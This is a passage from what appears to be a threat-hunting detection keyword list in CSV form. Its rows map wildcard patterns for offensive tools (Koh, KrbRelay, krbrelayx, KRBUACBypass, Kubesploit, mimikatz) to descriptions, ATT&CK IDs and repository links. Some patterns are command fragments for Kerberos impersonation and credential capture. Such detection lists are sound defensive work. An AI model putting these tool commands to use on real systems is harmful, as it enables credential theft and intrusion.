- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh release all*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh release LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe capture*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe monitor*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*kpiecbcckbofpmkkkdibbllpinceiihk*,greyware_tool_keyword,DotVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*krackattacks*,offensive_tool_keyword,krackattacks-scripts,This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. 
For details behind this attack see our website and the research paper.,T1170 - T1555.003 - T1583.002,TA0003 - TA0007 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/vanhoefm/krackattacks-scripts,1,0,N/A,N/A,10,3233,783,2022-10-16T18:44:41Z,2017-10-18T12:58:08Z -*Kraken Mask by @DallasFR*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*kraken.py --connect --mode * --profile * --compiler *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KrakenMask-main*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*krb2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*krb5/kerberosv5.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 
- T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*krb5decoder*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*krb5-enum-users *,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*krb5-enum-users.*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*krbcredccache.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*krbjack -*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjack.tcpforward*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - 
T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjacker.py*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjack-main*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*KrbRelay*misc*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay*smb*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay*spoofing*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.csproj*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.exe*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*KrbRelay.sln*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelayUp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*krbrelayx*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/dirkjanm/krbrelayx,1,0,N/A,10,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx.git*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*krbrelayx.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx-master*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbroast-pcap2hashcat.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*KRBUACBypass 1*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos 
Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.csproj*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.exe*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.sln*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*ktsuss-lpe.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*kubeletAttack.json*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Kubesploit Agent*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z 
-*kubesploitAgent-Darwin*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitAgent-Linux*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploit-main*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitServer-Darwin*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitServer-Linux*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kuhl_m_sekurlsa_nt6.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_nt6.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kuhl_m_sekurlsa_packages.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
